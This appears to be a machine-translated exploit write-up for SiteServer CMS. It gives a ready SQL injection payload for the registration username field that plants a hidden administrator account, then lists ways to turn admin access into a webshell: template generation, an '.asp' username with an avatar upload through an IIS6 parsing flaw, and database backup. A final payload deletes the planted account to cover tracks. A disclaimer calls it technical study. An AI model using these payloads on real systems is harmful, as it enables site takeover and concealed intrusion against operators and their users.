Author: blue girl
The problem is in the UserCenter. Pages. DLL in the Register, the registration process is logical to have problems, as follows:
The program put the user name into the database query, if the user name is not repeated, into the second step;
Then in the remote detection of the user name if it contains illegal characters, if not, the process proceeds to a third step;
The registration of new users into the database.
Since in the first step, the program does not perform any processing it into a database query, then you can xxoo. Orz。。。。
User name fill in the following statement, and other places properly filled.
1 2 3');insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
Submitted after registration to the library insert a user name: blue password: lanhai super user.
Default background address: http://127.0.0.1/siteserver
Get the webshell or directly mention the right to be a benevolent see benevolence the wise see wisdom of the living, each home has the home method, I probably looked, there are 3 kinds of method
Site management-on display functions-template management-on the Add single page template-direct generate aspx
Member permissions-for adding user-on user name is: 1. asp
With just added 1. asp to login, go in after uploading a personal avatar, using IIS6 parsing vulnerabilities have webshell
（ps: the background to add the user does not verify whether it contains illegal characters
System Tools-on the utility-of the machine parameters view
You can see the database type, name, WEB path
System Tools-Database Tools-on the SQL statement query
This function do good, directly is equivalent to a Query Analyzer, what echoes are there, you can backup give the webshell, or the use of sqlserver improperly configured directly XXOO
xxoo finished remember to
1 2 3');delete bairong_Administrator where UserName='blue';--
For the user name to be registered, and do cleaner work.
Finally, I hope siteserver see after timely repair, this article only as a technical study, do not for illegal purposes.